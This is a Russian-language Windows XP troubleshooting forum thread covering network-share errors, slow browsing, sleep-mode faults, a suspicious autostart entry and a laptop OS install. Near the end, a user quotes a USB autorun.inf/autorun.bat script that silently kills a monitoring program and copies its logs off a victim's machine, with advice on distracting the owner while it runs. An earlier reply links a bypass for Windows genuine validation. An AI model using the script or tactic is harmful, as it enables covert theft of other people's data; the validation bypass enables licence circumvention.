соглашусь. но, если хочешь индивидуальный вариант винды- стоит чуть поработать. зато будешь гордиться сделанным.)))))))
Вид для печати
соглашусь. но, если хочешь индивидуальный вариант винды- стоит чуть поработать. зато будешь гордиться сделанным.)))))))
[QUOTE=moretti;4617189]соглашусь. но, если хочешь индивидуальный вариант винды- стоит чуть поработать. зато будешь гордиться сделанным.)))))))[/QUOTE]
Так никто же и не спорит, себе лично сам точу :)
[QUOTE=moretti;4617189]соглашусь. но, если хочешь индивидуальный вариант винды- стоит чуть поработать. зато будешь гордиться сделанным.)))))))[/QUOTE]
Хотел бы добавить. Мало того, ты будешь уверен в том что ты сделал. И что эта "сборка" не содержит нежелательного ПО и не сделана кривыми руками :)
[quote=Spectre;4616984]
Сам пользуюсь[/quote]
тоже использую, на домашней машине потестил, потом надо было чтото ставить на рабочий нотик ессесено поставил эту сборку, но вот правда про быстродействие ничего не скажу, виндоус хр как виндоус хр.
а так как обычная пиратская сборка, разве что мне пуск-выполнить приглянулось.
ихний сайт xtreme.ws
[QUOTE=moretti;4617128]в разве сложно протестировать пару машин cure it?
сам себе и ответишь[/QUOTE]
тестировал и ним и нодом...вирусов небыло..Какие еще варианты?
[QUOTE=Spectre;4617127]Я же вам ответил и задал вопрос: - В каком состоянии службы?
GP - это Group Policy.[/QUOTE]
С этим все нормально.
[QUOTE=Архиангел;4617497]С этим все нормально.[/QUOTE]
Они обе в состоянии "работает"?
Зайдите сам на себя, типа \\name
[QUOTE=Spectre;4617602]Они обе в состоянии "работает"?
Зайдите сам на себя, типа \\name[/QUOTE]
Вроде работают..Высветело мои разшареные доки...
[QUOTE=Архиангел;4618032]Вроде работают..Высветело мои разшареные доки...[/QUOTE]
А какая ошибка возникает при попытке зайти на другой комп? Скриншот можно? Или текст
[QUOTE=Spectre;4618048]А какая ошибка возникает при попытке зайти на другой комп? Скриншот можно? Или текст[/QUOTE]
Вот так..
95% что это служба "Сервер" на машине 192.168.92.106. Проверьте обе там.
Попробуйте еще с той машины зайти на саму себя
[QUOTE=Spectre;4618732]95% что это служба "Сервер" на машине 192.168.92.106. Проверьте обе там.
Попробуйте еще с той машины зайти на саму себя[/QUOTE]
На "себя" заходит. Сейчас проверю службу... А она должна быть отключена? И еще,сервиров там много,не подскажите какой именно?
[QUOTE=Архиангел;4618773]На "себя" заходит. Сейчас проверю службу... А она должна быть отключена? И еще,сервиров там много,не подскажите какой именно?[/QUOTE]
Служба так и называется "сервер"
на мой комп правой кнопкой - управление - службы. Ищите в списке службы "сервер" и "рабочая станция".
Еще можно посмотреть на "Служба обеспечения сети"
[QUOTE=Spectre;4618823]Служба так и называется "сервер"
на мой комп правой кнопкой - управление - службы. Ищите в списке службы "сервер" и "рабочая станция".
Еще можно посмотреть на "Служба обеспечения сети"[/QUOTE]
Служба "сервер" и "рабочая станция" работает.
выложите сюда результаты выполнения команд
[B]net config
net share
ipconfig /all[/B]
Да, кстати, попробуйте еще учетку "Гость" включить для чистоты эксперимента
[quote=Архиангел;4618659]Вот так..[/quote]
ошибок в событиях-система никаких нет случаем ?
[QUOTE=ODESIT;4619012]ошибок в событиях-система никаких нет случаем ?[/QUOTE]
Нет,никаких ошибок небыло.
вот скриншоты. А что именно вас интересует с команды ipconfig?
[QUOTE=Архиангел;4619103]вот скриншоты. А что именно вас интересует с команды ipconfig?[/QUOTE]
все. ipconfig /all
на вид с шарами все нормально. Попробуйте включить гостя и службу обеспечения сети если она отключена
Да, и какой антивирь стоит? Отключите на момент эксперимента
вот
Посмотреть могу в режиме ICQ + TeamViewer. Если интересует - 150270061
[quote=Архиангел;4619074]Нет,никаких ошибок небыло.[/quote]
повторюсь ещё раз, мне кажется у вас перевыборы начались, хотя могу ошибатся.
пуск-выполнить-control-admintools-ентер -просмотр событий-система
ошибка примерно такого плана
Тип события: Уведомление
Источник события: BROWSER
Категория события: Отсутствует
Код события: 8033
Дата: 11.03.2009
Время: 15:49:25
Пользователь: Н/Д
Компьютер: ODESIT
Описание:
Драйвер обозревателя сети инициировал выборы в сети \Device\NetBT_Tcpip_{9FE8CCBD-FF50-490B-8381-2024F8F47028}, так как был остановлен основной обозреватель сети.
и можно сюда вывод команды NBTSTAT -A 192.168.1.10 (192.168.1.10 подставляем проблемный адрес в сети)
[QUOTE=Spectre;4619319]Посмотреть могу в режиме ICQ + TeamViewer. Если интересует - 150270061[/QUOTE]
Пока что не имею возможности зайти в аську.
есть такое...
Нехорошо вообще русские имена давать, гостя включили?
еще один адресс протестировал...
[QUOTE=Spectre;4619594]Нехорошо вообще русские имена давать, гостя включили?[/QUOTE]
Знаю...ну это на время...гость был включен и до этого..
Пойдите в администрирование - локальная политика безопасности - локальные политики - назначение прав пользователя. Там есть отказ в доступе к компьютеру из сети. Если гость есть в списке - удалите его. Это на 106
[quote=Архиангел;4619601]еще один адресс протестировал...[/quote]
и ни на одном из них нет примерно такой строки в конце
..__MSBROWSE__.<01> GROUP Зарегистрирован
[QUOTE=ODESIT;4619748]
..__MSBROWSE__.<01> GROUP Зарегистрирован[/QUOTE]
Это не обязательное условие видимости :)
надеюсь в сетевом соеденении стоит флажок на службе доступа к файлам и принтерам ?
[QUOTE=ODESIT;4619824]надеюсь в сетевом соеденении стоит флажок на службе доступа к файлам и принтерам ?[/QUOTE]
:) конечно есть...)
[QUOTE=Spectre;4619686]Пойдите в администрирование - локальная политика безопасности - локальные политики - назначение прав пользователя. Там есть отказ в доступе к компьютеру из сети. Если гость есть в списке - удалите его. Это на 106[/QUOTE]
Все что было там удалил..перезагрузился..пока что безуспешно..(
[quote=Архиангел;4619872]:) конечно есть...)[/quote]
ну незнаю чесно говоря, не сидя за компом понять что там у тебя трудно, а если спрашивать то мы тут счас весь форум испишем.
поробуй почитать [URL="http://forum.ru-board.com/topic.cgi?forum=8&topic=2161&start=0"]эту тему[/URL] там многие проблемы которые могут быть описаны.
[QUOTE=Архиангел;4619905]Все что было там удалил..перезагрузился..пока что безуспешно..([/QUOTE]
Смотреть надо вживую так сказать :)
Если не боитесь TeamViewer'a, то попробую помочь
[QUOTE=Spectre;4619998]Смотреть надо вживую так сказать :)
Если не боитесь TeamViewer'a, то попробую помочь[/QUOTE]
Если сегодня не получится, тогда придется через TeamViewer'a наверно..пока что еще пороюсь в нете насчет этого вопроса. Пока что спасибо за помощь.
[QUOTE]Человек написал что пинг проходит, значит брандмауэр отпадает[/QUOTE]
А вот и не факт - про порты читали?
[QUOTE=Прoхожий;4626572]А вот и не факт - про порты читали?[/QUOTE]
Читали. По дефолту блокирует, сомневаюсь, что если человек задает такие вопросы, он у него настроен на прохождение icmp
[QUOTE=Spectre;4611000]Факюбилл :)
А может сп3 скачаете? Проблема должна уйти
Можно через винапдейт
а можно [URL="http://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=5b33b5a8-5e76-401f-be08-1e1555d4f3d4"]тут[/URL] укачать
Да что такое сейчас 300 мб? 10 минут времени[/QUOTE]
Скачала сп3, запустила, обновилось, после перезагрузки появилось сообщение
[IMG]http://s56.radikal.ru/i152/0903/da/99014023a7f3.jpg[/IMG]
надеюсь, что эта фигня уже исчерпалась)))
[quote=scarpio27;4637051]Скачала сп3, запустила, обновилось, после перезагрузки появилось сообщение
[IMG]http://s56.radikal.ru/i152/0903/da/99014023a7f3.jpg[/IMG]
надеюсь, что эта фигня уже исчерпалась)))[/quote]
давай нажмём на надпись "щёлкните здесь" и что там пишется можна сюда, и кстати сегодня 20 число, но не как не 9 :D
[QUOTE=ODESIT;4637626]давай нажмём на надпись "щёлкните здесь" и что там пишется можна сюда, и кстати сегодня 20 число, но не как не 9 :D[/QUOTE]
я просто так поняла, что он сообщает о первой дате возникновения ошибки. И раньше после такого рода сообщений (только там четко писалось, что возникла ошибка и приложение будет закрыто, а тут нет) интернет вылетал, а щас нет:D. Я уже эту гадость убрала, ттт, пока все работает нормально:)
[quote=scarpio27;4637831]я просто так поняла, что он сообщает о первой дате возникновения ошибки. И раньше после такого рода сообщений (только там четко писалось, что возникла ошибка и приложение будет закрыто, а тут нет) интернет вылетал, а щас нет:D. Я уже эту гадость убрала, ттт, пока все работает нормально:)[/quote]
брандмаузер(фаервол) включила ? если нет то [URL="https://forumodua.com/showpost.php?p=4611096&postcount=184"]включи[/URL],
каким образом убрала ?
[QUOTE=ODESIT;4638254]брандмаузер(фаервол) включила ? если нет то [URL="https://forumodua.com/showpost.php?p=4611096&postcount=184"]включи[/URL],
каким образом убрала ?[/QUOTE]
да, включила уже, пасиб:rose:, а убрала - скачала сп3, запустила его, после него пока все спокойно, ттт:)
[QUOTE=scarpio27;4640813]да, включила уже, пасиб:rose:, а убрала - скачала сп3, запустила его, после него пока все спокойно, ттт:)[/QUOTE]
Ну, слава богу :)
Народ, у меня вот что происходит. Кликает по будь то закладка в мозилле, или ссылка и оно думает очень долго , приходится раза по 3 на один объект кликать. а еще когда кликаешь оно как бы выделяет ( будь то банер , ссылка, закладка ) и тащит за собой.
У меня такое было однажды. само прошло. винда ХР лицензионная. недавно переставляла.
вот наглядный пример залипает и тянет за собой изображение. потом комп очень долго тормозит и соображает долго.
[URL=http://radikal.ru/F/s47.radikal.ru/i116/0903/26/b1899d915903.jpg.html][IMG]http://s47.radikal.ru/i116/0903/26/b1899d915903t.jpg[/IMG][/URL]
[quote=Паноптикум;4645295]Народ, у меня вот что происходит. Кликает по будь то закладка в мозилле, или ссылка и оно думает очень долго , приходится раза по 3 на один объект кликать. а еще когда кликаешь оно как бы выделяет ( будь то банер , ссылка, закладка ) и тащит за собой.
У меня такое было однажды. само прошло. винда ХР лицензионная. недавно переставляла.
вот наглядный пример залипает и тянет за собой изображение. потом комп очень долго тормозит и соображает долго.
[URL="http://radikal.ru/F/s47.radikal.ru/i116/0903/26/b1899d915903.jpg.html"][IMG]http://s47.radikal.ru/i116/0903/26/b1899d915903t.jpg[/IMG][/URL][/quote]
ДА СТРАНАЯ ОБШИБКА , МЫШКУ МИНЯТЬ ПРОБЫВАЛИ ?, ПРОБЛЕМЫ В ОПЕРЕ ТОЖЕ ЕСТЬ ?
КОМП НА ВИРУСЫ НАДЕЮСЬ ПРОВЕРЕН
не в мышке дело. его иногда "попускает", так сказать ( комп). вот сейчас порядок. у мну не опреа , а мозиила. вообще да есть трабла, иногда белый экран так сказать и в Процессах бывает заргуженность именно на фаерфоксе
Кол-во памяти и антивирус, пожалуйста
раньше был макафи с недавнего времени касперский. 512. да. периодами и правда ругается что недостаточно вирутальной памяти . но сейчас молчит. как с этим боороться. у меня ничего такого не стоит сейчас. даже офис.
Еще бзик например может страница вверх скакануть ( при этом выделять текст), или начтаь прокручитваььб.ся вообще мне весело:)
А откуда уверенность, что дело не в мышке? Пробовали менять?
пробоавла. комп порой тормозит нечеловечески. не только залипания. а элементарно браузер, проводник открывается по секунд 10. вот сейчас его переклинило работает нормально
Рекомендую установить process explorer. Он по возможностям побогаче стандартного виндового таск манагера. В частности, он показывает не только сам процесс, но и его родителя, а также подробную информацию о нем. Очень рекомендую во время очередного "бзика" компа взглянуть на процесс, который будет отъедать процессорное время и память. Думаю, что проблема будет быстро устранена после ее диагностировки.
[quote=Паноптикум;4647151]
Еще бзик например может страница вверх скакануть ( при этом выделять текст), или начтаь прокручитваььб.ся вообще мне весело:)[/quote]
это похоже на мышку
[quote=Lexxx;4649287]Рекомендую установить process explorer. Он по возможностям побогаче стандартного виндового таск манагера. В частности, он показывает не только сам процесс, но и его родителя, а также подробную информацию о нем. Очень рекомендую во время очередного "бзика" компа взглянуть на процесс, который будет отъедать процессорное время и память. Думаю, что проблема будет быстро устранена после ее диагностировки.[/quote]
или AnVir Task Manager
вот
[URL=http://radikal.ru/F/s55.radikal.ru/i149/0903/9b/4c3cb8f4f6e5.jpg.html][IMG]http://s55.radikal.ru/i149/0903/9b/4c3cb8f4f6e5t.jpg[/IMG][/URL]
При попытке поставить комп в спящий режим иногда выдаёт жёлтый треугол. с восклицат. знаком в трее с текстом - Недостаточно системных ресурсов для завершения вызова API . Можно исправить это?
[url]http://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=9D20F96A-A8D6-4627-89F7-787CD9B3852C[/url]
Попробуйте патчик
[quote=austyn;4761543]При попытке поставить комп в спящий режим иногда выдаёт жёлтый треугол. с восклицат. знаком в трее с текстом - Недостаточно системных ресурсов для завершения вызова API . Можно исправить это?[/quote]
и так ради интереса сколько памяти в компе и сколько свободного места на диске С:\,
austyn: посмотри тут [url]http://support.microsoft.com/kb/909095/ru[/url]
Причина : Эта проблема возникает из-за того, что диспетчер питания ядра Windows не может получить память, необходимую для подготовки компьютера к переходу в спящий режим. Но я Не смогу скачать этот патчик поскольку версия ОС не пройдёт проверку подлин.
3.25 Гб ОЗУ , 35Гб своб. на диске С.
[QUOTE=austyn;4768241]Причина : Эта проблема возникает из-за того, что диспетчер питания ядра Windows не может получить память, необходимую для подготовки компьютера к переходу в спящий режим. Но я Не смогу скачать этот патчик поскольку версия ОС не пройдёт проверку подлин.
3.25 Гб ОЗУ , 35Гб своб. на диске С.[/QUOTE]
Тогда посмотри, на каком разделе находится файлик hibernate. Может в структуре самого файлика нарушено. Можно попробовать отключить функцию спящего режима и после перезагрузки снова включить.
дай эмеил я тебе скину
[quote=austyn;4768241]Причина : Эта проблема возникает из-за того, что диспетчер питания ядра Windows не может получить память, необходимую для подготовки компьютера к переходу в спящий режим. Но я Не смогу скачать этот патчик поскольку версия ОС не пройдёт проверку подлин.
3.25 Гб ОЗУ , 35Гб своб. на диске С.[/quote]
по поводу проверки подлиности, скачай [URL="http://philka.ru/forum/index.php?showtopic=2736&st=725&p=177320&#entry177320"]это[/URL], установи и можешь спокойно ставить патч
Да вроде нашёл и установил уже этот самый патч ([url]http://support.microsoft.com/kb/909095/ru[/url] )- для неподлин. ОС причём... Но ещё не проверял.Надеюсь - теперь исправится.
В любом случае, большое спасибо всем откликнувшимся.:thank_you2:
Добрый день всем. У меня вопрос возник.
На ноуте стоит программка AnVir Task Manager . Вчера в автозагрузке обратила внимание на непонятное приложение под названием expmon.exe ,имеющее степень риска 56%. Я выгрузила из автозагрузки. Прописанно оно - C:\WINDOWS
Антивирус ни чего не показывает.
Может кто-то знает что это такое и с чем его едят?
twex.exe
есть такой файл в c:\windows\system32 ?
У меня такого нет...,но есть похожий twext.dll
а C:\WINDOWS\sxexp32.dll ?
CureIT прогоняли?
это троян
Да , есть сидит в C:\WINDOWS\sxexp32.dll
Если это троян ...то почему его не видит Outpost PRO Firewall (2009) ?
И что мне теперь можно с этим сделать....? (((
[QUOTE=Svettiss;4792892]Да , есть сидит в C:\WINDOWS\sxexp32.dll
Если это троян ...то почему его не видит Outpost PRO Firewall (2009) ?
И что мне теперь можно с этим сделать....? ((([/QUOTE]
Наверное потому что это не антивирус а файрволл.
Скачайте cureIT
[url]http://free.drweb.com/?lng=ru[/url]
и в безопасном режиме прогоните проверку
[quote=Svettiss;4792308]Добрый день всем. У меня вопрос возник.
На ноуте стоит программка AnVir Task Manager . Вчера в автозагрузке обратила внимание на непонятное приложение под названием expmon.exe ,имеющее степень риска 56%. Я выгрузила из автозагрузки. Прописанно оно - C:\WINDOWS
Антивирус ни чего не показывает.
Может кто-то знает что это такое и с чем его едят?[/quote]
на будуещее
в AnVir Task Manager в инструментах есть такое как "проверить файл антивирусами на virustotal" если есть какой-то подозрительный файл то воспользуйтесь, проверит 39 антивирусами, но обращать внимание нужно на более популярные антивирусы.
[QUOTE]Скачайте cureIT
[url]http://free.drweb.com/?lng=ru[/url][/QUOTE]
Скачала ,проверила -всё чисто.
[QUOTE]в AnVir Task Manager в инструментах есть такое как "проверить файл антивирусами на virustotal" если есть какой-то подозрительный файл то воспользуйтесь, проверит 39 антивирусами[/QUOTE]
Им проверила тоже....всё чисто..
[QUOTE=Svettiss;4794029]Скачала ,проверила -всё чисто.
[/QUOTE]
Полной проверкой? Быстро вы
У меня на этом компе на диске С полный обьём 23,8 GB-свободно14,1GB.....
а на диске Е полныё обьём 87,9 GB, свободно - 86,2 GB...
Наверное, по-этому и быстро...
[QUOTE=Svettiss;4794203]У меня на этом компе на диске С полный обьём 23,8 GB-свободно14,1GB.....
а на диске Е полныё обьём 87,9 GB, свободно - 86,2 GB...
Наверное, по-этому и быстро...[/QUOTE]
В msconfig все чистенько?
[QUOTE]В msconfig все чистенько?[/QUOTE]
Все-таки я не очень , а точнее я очень плохо понимаю о чём речь...:shine:
Вроде ни где, ни чего не высвечивается :(.
[QUOTE=Svettiss;4794428]Все-таки я не очень , а точнее я очень плохо понимаю о чём речь...:shine:
Вроде ни где, ни чего не высвечивается :(.[/QUOTE]
пуск-выполнить
там пишете msconfig
Потом смотрите автозагрузка. Список сюда
Я удалила из автозагрузки это приложение ещё утром...наверное не надо было..
[IMG]http://s51.radikal.ru/i132/0904/52/702345626d96.jpg[/IMG]
Хм, ну тут на вид левого ничего нет, разве stsystra, но это на звуковые дрова похоже.
Скачайте еще программку Autoruns, посмотрите более детально :) Искать в Logon
у меня стоит AnVir Task Manager - вроде бы это аналог Autoruns...
вот его скрин
[IMG]http://s47.radikal.ru/i116/0904/d4/dd9798273619.jpg[/IMG]
А может не париться и просто удалить этот файлик ???(из папки)
Можно попробовать )) Но вы его куда-то переместите на всякий случай а потом, если без него все будет окей, удалите
Приложение удалила безвозвратно....
И вот что еще нагуглила....
А смысл такой: нужно сделать так, что бы при открытии вашей флэшки, логи Эксперта копировались на нее, далее вы логи на своем эксперте заменяете этими логами (эксперт на это время нужно выгрузить из памяти). И смотрите на своем компе.
Теперь на вашей флэшке создадим два файла:
Первый - autorun.inf
Запишем в него следующее:
[autorun]
shellexecute=autorun.bat
Теперь второй - autorun.bat
Запишем в него следующее:
@echo off
if exist f:\exprep goto Good
taskkill /f /im expmon.exe>nul
md f:\exprep
xcopy c:\WINDOWS\exprep f:\exprep /s /e /h >nul
attrib -h -s -r c:\WINDOWS\exprep\*.* >nul
del c:\WINDOWS\exprep\*.* /q >nul
start c:\WINDOWS\expmon.exe >nul
:Good
explorer.exe .
Установите атрибут Скрытый для обоих файлов.
Немного пояснений по autorun.bat:
Проверяется наличие папки f:\exprep, если она есть, то идет переход к метке Good. Поэтому необходимо убирать папку f:\exprep после того, как скопируете логи с флэшки;
Убивается процесс эксперта в памяти;
Создается папка f:\exprep;
Копируются логи на флэшку;
Удаляются логи с компа, чтобы каждый раз копировались только новые логи, а старые удалялись;
Эксперт опять загружается в память;
последняя команда открывает содержимое флэшки в проводнике.
Чтобы поизошел автозапуск нужно открывать флэшку через Мой компьютер.
Социальная инженерия: копируете несколько файлов на флэшку, например, фотки. Далее под предлогом их показать, вставляете флэшку, открываете ее содержимое через Мой компьютер, показываете фотки (в это время копируются логи), далее отвлекаетесь на что-нить другое (чтобы логи до конца докопировались, если их много). Вот и все :).
Если автозапуск не будет работать, то просто запускаете этот BAT файл с флэшки вручную.
И что за вредитель посидел за моим компом?
Спасибо большое за участие....
Добрый вечер!Купила сегодня новый ноутбук,подскажите как установить на него Windows Vista
[quote=Кнопочка-Кнопочка;4877752]Добрый вечер!Купила сегодня новый ноутбук,подскажите как установить на него Windows Vista[/quote]
зачем виста ? из-за того что она красивая ? ставте WindowsXP SP3
установочный диск есть у вас ?
Да он шел с нею в комплекте:parting2:Мне откровенно говоря совсем не хочется ею пользоваться
[quote=Кнопочка-Кнопочка;4878119]Да он шел с нею в комплекте:parting2:Мне откровенно говоря совсем не хочется ею пользоваться[/quote]
тогда самый простой способ поставить висту так как все драйвера наверняка под неё, если ставить хр прийдётся искать драйвера в инете ,
какая модель ноутбука, номер ?
[QUOTE=Кнопочка-Кнопочка;4877752]Добрый вечер!Купила сегодня новый ноутбук,подскажите как установить на него Windows Vista[/QUOTE]
Неужели вы купили этот ноут без предустановленной висты?
[QUOTE=ODESIT;4878074]зачем виста ? из-за того что она красивая ? ставте WindowsXP SP3
установочный диск есть у вас ?[/QUOTE]
Затем, что она лучше будет работать на этом конкретном ноутбуке. Да и вообще она лучше ;)
[QUOTE=ODESIT;4878757]тогда самый простой способ поставить висту так как все драйвера наверняка под неё, если ставить хр прийдётся искать драйвера в инете ,
какая модель ноутбука, номер ?[/QUOTE]
Samsung R58P
[QUOTE=Lexxx;4880654]Неужели вы купили этот ноут без предустановленной висты?[/QUOTE]
Да,запакованнее запакованного:girl_sigh:
[quote=Spectre;4882865]Затем, что она лучше будет работать на этом конкретном ноутбуке. Да и вообще она лучше ;)[/quote]
ты имеешь ввиду что виста будет работать быстрее ? будет жрать меньше памяти чем хр ?
[QUOTE=Кнопочка-Кнопочка;4882918]Да,запакованнее запакованного:girl_sigh:[/QUOTE]
http://www.samsung.com/kz_ru/support/download/supportDown.do?model_nm=NP-R58PLUS&mType=DR&vType=L&disp_nm=NP-R58PLUS
тут дрова
[quote=Кнопочка-Кнопочка;4882913]Samsung R58P[/quote]
если решите ставить хр то все драйвера которые понадобятся [URL="http://www.samsung.com/kz_ru/support/download/supportDown.do?model_nm=NP-R58PLUS&mType=DR&vType=L&disp_nm=NP-R58PLUS"]тут[/URL]
[quote=Spectre;4883171]
тут дрова[/quote]
интересно на сколько секунд ты меня опередил ?:D
[QUOTE=ODESIT;4883211]интересно на сколько секунд ты меня опередил ?:D[/QUOTE]
Даже не знаю.. :) Зашел, открыл тему да и кинул ссылку :)
виста это невиндоус, эт переходная гадость. лутше уж ставить ХР или 7мерку, хотя с 7меркой яб ешо подождал чуток чтоб подправили все бока
[QUOTE=GERAIN;4885400]виста это невиндоус, эт переходная гадость. лутше уж ставить ХР или 7мерку, хотя с 7меркой яб ешо подождал чуток чтоб подправили все бока[/QUOTE]
Ваши аргументы? ;)
[QUOTE=GERAIN;4885400]виста это невиндоус, эт переходная гадость. лутше уж ставить ХР или 7мерку, хотя с 7меркой яб ешо подождал чуток чтоб подправили все бока[/QUOTE]
[QUOTE=Spectre;4885832]Ваши аргументы? ;)[/QUOTE]
А какие могут быть аргументы, если человек рекомендует ставить систему, которой официально пока не существует?
Ой ребята спасибо огромное всем!!!:curtsey::curtsey::curtsey:Сегодня поставила ХР 2009 г.Спасибо за ссылки и участие:curtsey::party: